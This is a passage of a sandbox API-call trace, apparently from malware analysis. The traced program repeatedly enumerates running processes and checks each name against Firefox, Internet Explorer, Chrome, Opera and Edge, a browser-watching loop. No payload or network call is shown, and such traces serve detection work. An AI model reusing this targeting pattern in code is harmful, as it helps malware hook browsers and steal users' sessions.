lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0169.178] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0169.178] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0169.178] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0169.179] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0169.179] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0169.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0169.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0169.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0169.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0169.179] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0169.180] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0169.180] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0169.180] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0169.180] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0169.180] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0169.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0169.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0169.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0169.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0169.180] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0169.181] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0169.181] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0169.181] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0169.181] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0169.181] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0169.181] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0169.181] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0169.182] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0169.182] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0169.182] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0169.182] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0169.182] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0169.182] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0169.182] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0169.182] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0169.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0169.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0169.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0169.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0169.183] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0169.183] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0169.183] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0169.183] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0169.183] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0169.183] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0169.184] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0169.184] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0169.184] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0169.184] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0169.184] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.184] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0169.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0169.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0169.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0169.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0169.185] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.185] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0169.185] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0169.185] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0169.185] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0169.185] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0169.185] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.185] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0169.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0169.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0169.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0169.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0169.186] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0169.186] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0169.186] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0169.186] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0169.186] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0169.186] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0169.187] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0169.187] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0169.187] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0169.187] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0169.187] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.187] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0169.188] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0169.188] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0169.188] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0169.188] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0169.188] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0169.188] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0169.188] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0169.188] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0169.188] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0169.188] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0169.189] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0169.189] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0169.189] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0169.189] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0169.189] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0169.189] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0169.189] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0169.189] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0169.189] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0169.190] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0169.190] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0169.190] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0169.190] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0169.190] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0169.190] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.191] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0169.191] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0169.191] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0169.191] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0169.191] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.191] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.191] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.191] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.191] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.191] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0169.192] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0169.192] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0169.192] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0169.192] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0169.192] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.193] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.193] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.193] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.193] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.193] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0169.193] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0169.193] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0169.193] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0169.193] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0169.193] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.194] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.194] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.194] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.194] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.194] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.194] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.194] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.194] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.194] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0169.194] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0169.195] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0169.195] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0169.195] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0169.195] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0169.195] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.196] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0169.196] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0169.196] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0169.196] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0169.196] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.196] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.196] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.196] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.196] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0169.196] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.197] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0169.198] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.198] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.198] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.198] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.198] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0169.198] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0169.199] CloseHandle (hObject=0xe8) returned 1 [0169.199] Sleep (dwMilliseconds=0x3e8) [0170.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0170.240] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.240] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0170.240] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0170.240] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0170.240] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0170.240] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0170.240] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0170.241] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0170.241] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0170.241] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0170.241] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0170.241] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0170.241] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0170.241] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0170.241] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0170.241] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0170.241] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0170.242] lstrcmpiA (lpString1="smss.exe", 